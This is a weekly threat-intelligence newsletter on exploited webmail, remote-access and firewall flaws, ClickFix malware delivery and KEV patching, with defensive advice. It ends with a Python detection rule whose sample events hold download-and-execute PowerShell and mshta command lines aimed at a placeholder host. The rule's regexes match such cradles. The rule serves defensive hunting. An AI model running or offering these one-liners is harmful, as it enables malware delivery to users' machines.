Market & Momentum - 02/23/2026

This week opens with sharpened enterprise risk around exploited webmail flaws, remote access takeover paths, and perimeter device compromise... proving (again) that attackers don’t need creativity when your edge is doing the hard work for them.


Over the last ~72 hours, threat signals converged on five patterns: active exploitation in webmail, remote access platform compromise, hardware/vendor edge exposure, “living-off-the-user” malware delivery, and KEV-driven patch compression.

Together, these trends reinforce a simple operational reality: if your external-facing surface area isn’t tightly governed (patch, isolate, monitor), your incident response plan becomes the change-management process you never had.

📈 Risk Forecast – The Week Ahead 📉

| Trend (Macro) | Likelihood | Direction | Signal for the Week |
|---|---|---|---|
| Active exploitation of internet-facing email/webmail platforms | 81% | 🔺 Rising | Webmail flaws are getting operationalized quickly once exploit details circulate. |
| Remote access platform compromise enabling rapid lateral movement | 77% | 🔺 Rising | RCE + persistence inside privileged access tooling is a worst-case combo. |
| Perimeter device compromise (firewalls/edge appliances) at scale | 74% | 🔺 Rising | Opportunistic scanning + weak hygiene = mass exploitation potential. |
| Social-engineering delivery chains (“ClickFix”-style execution) | 69% | 🔺 Rising | Users are still being turned into the payload runner. |
| KEV-driven patch triage pressure | 66% | ➡ Stable | “Actively exploited” listings keep tightening patch timelines and outage risk. |

🔎 Key Watchlist Items 🔍
  1. Roundcube webmail vulnerabilities exploited in attacks
    CISA-backed reporting shows attackers actively abusing recent Roundcube bugs, meaning externally reachable webmail stacks should be treated as Roundcube-exposed until proven otherwise.

  2. BeyondTrust RS/PRA critical flaw actively exploited (CVE-2026-1731)
    Threat actors are using a high-severity remote access weakness to gain persistence and move laterally, turning privileged tooling into an attacker trampoline via CVE-2026-1731.

  3. CISA orders rapid patching of an actively exploited Dell flaw
    KEV-driven deadlines are forcing “patch-now” decisions; if Dell management utilities exist in your estate, treat this as a KEV-patch priority, not a backlog item.

  4. AI-assisted actor reportedly breached 600 Fortinet FortiGate firewalls
    Whether you buy the “AI” label or not, the pattern is the same: exposed firewall surfaces get hammered at scale, and “edge security” becomes an ironic phrase during a FortiGate-breach wave.

  5. ClickFix campaign abusing compromised sites to deploy a new RAT
    This is “user-assisted execution” evolving again: compromised legit sites push scripted steps that install malware when victims comply, making ClickFix an evergreen problem for endpoint and awareness programs.

  6. CISA adds four more vulnerabilities to the Known Exploited catalog
    Another KEV update means more patch triage pressure; operationally, treat KEV-additions as your “what attackers are using right now” shortlist.


📊 Emerging Patterns 📊

Webmail remains a high-leverage entry point: It’s exposed, commonly under-patched, and immediately valuable for credential access and internal pivoting.

Remote access tools are becoming “instant enterprise access”: Attackers leverage them as soon as vulnerabilities hit, especially when the tools sit on privileged lanes.

Edge appliances are still the soft underbelly: If your firewall is reachable, it’s being scanned… nonstop.

User-execution chains keep winning: Because they bypass a lot of preventive controls with one simple trick… the user did it.

KEV isn’t just compliance: It’s your best proxy for what’s weaponized and being used at scale.

⏰ Call to Action ⏰

Webmail exploitation defense: confirm patch levels, restrict admin paths, and hunt for abnormal auth spikes, mailbox rule creation, suspicious POST patterns, and weird attachment/SVG handling.

Remote access hardening (BeyondTrust-class systems): isolate management interfaces, enforce MFA everywhere, review privileged session logs, and hunt for new services, scheduled tasks, and unexpected admin account activity.

Dell/endpoint utility exposure: locate impacted components fast (asset inventory), patch with validation, then verify telemetry continuity (don’t “patch blind” and lose signal).

Fortinet edge posture: confirm firmware levels, reduce internet exposure, rotate credentials/keys where applicable, and baseline config changes (especially admin accounts and remote management toggles).

ClickFix containment: detect suspicious command execution patterns, block common LOLBAS abuse paths where feasible, and reinforce the rule: “IT will not ask you to paste commands from a webpage.”

KEV triage discipline: prioritize externally reachable + identity-adjacent systems first; schedule downtime intentionally rather than during an incident bridge.
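For the ClickFix containment item above, one way to express "suspicious command execution patterns" as a hunt over process-creation telemetry. This is an added example, not part of the newsletter; the event field names, the interpreter list, the indicator regexes and the sample events are all assumptions constructed for illustration.

```python
import ntpath
import re

# Interpreters a pasted Run-dialog command usually invokes (assumed list).
INTERPRETERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe"}

# Command-line traits of download-and-execute one-liners (assumed heuristics).
INDICATORS = {
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+(?:hidden|h|1)\b", re.I),
    "encoded_command": re.compile(r"\s-e(?:nc(?:odedcommand)?)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|curl)\b", re.I),
    "inline_execute": re.compile(r"\b(?:iex|invoke-expression)\b", re.I),
    "remote_url": re.compile(r"https?://", re.I),
}

# Constructed sample events; hosts, users and URLs are placeholders.
SAMPLE_EVENTS = [
    {"host": "WS-014", "user": "alice", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": 'powershell -w hidden -c "iwr https://example.invalid/v.txt | iex"'},
    {"host": "WS-022", "user": "bob", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta https://example.invalid/verify.hta"},
    {"host": "WS-031", "user": "carol", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe"},  # user opening a shell: no indicators
    {"host": "SRV-02", "user": "SYSTEM", "parent_image": r"C:\Windows\System32\services.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell -w hidden -c iwr https://example.invalid/agent.ps1"},
]

def clickfix_hits(event):
    """Return matched indicator names when a user-launched interpreter looks pasted."""
    image = ntpath.basename(event["image"]).lower()
    parent = ntpath.basename(event["parent_image"]).lower()
    # Scope: interpreter started by the interactive shell (Run dialog, Explorer).
    if parent != "explorer.exe" or image not in INTERPRETERS:
        return []
    hits = sorted(n for n, rx in INDICATORS.items() if rx.search(event["command_line"]))
    # Two traits together, or mshta pointed at a URL, is worth an analyst's look.
    if len(hits) >= 2 or (image == "mshta.exe" and "remote_url" in hits):
        return hits
    return []

def triage(events):
    """List (host, user, indicators) for every event the rule flags."""
    return [(e["host"], e["user"], clickfix_hits(e)) for e in events if clickfix_hits(e)]

if __name__ == "__main__":
    for host, user, hits in triage(SAMPLE_EVENTS):
        print(f"{host} {user}: {', '.join(hits)}")
```

The service-launched PowerShell on SRV-02 is deliberately out of scope for this rule; it belongs to a separate detection for non-interactive parents.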

⚡ Monday Motivation ⚡

You don’t need perfect security…

You need owned assets, fast patch validation, and zero “mystery internet-facing boxes.” 

That’s how you survive weeks like this without living in your war room.

This week’s theme is simple: the edge is still the battleground, and the losers are the orgs who treat external exposure like a ticket queue instead of an emergency.

(P.S. Forward this to the SOC, infrastructure owners, and IAM leadership so patch urgency, edge governance, and remote access controls stay aligned.)
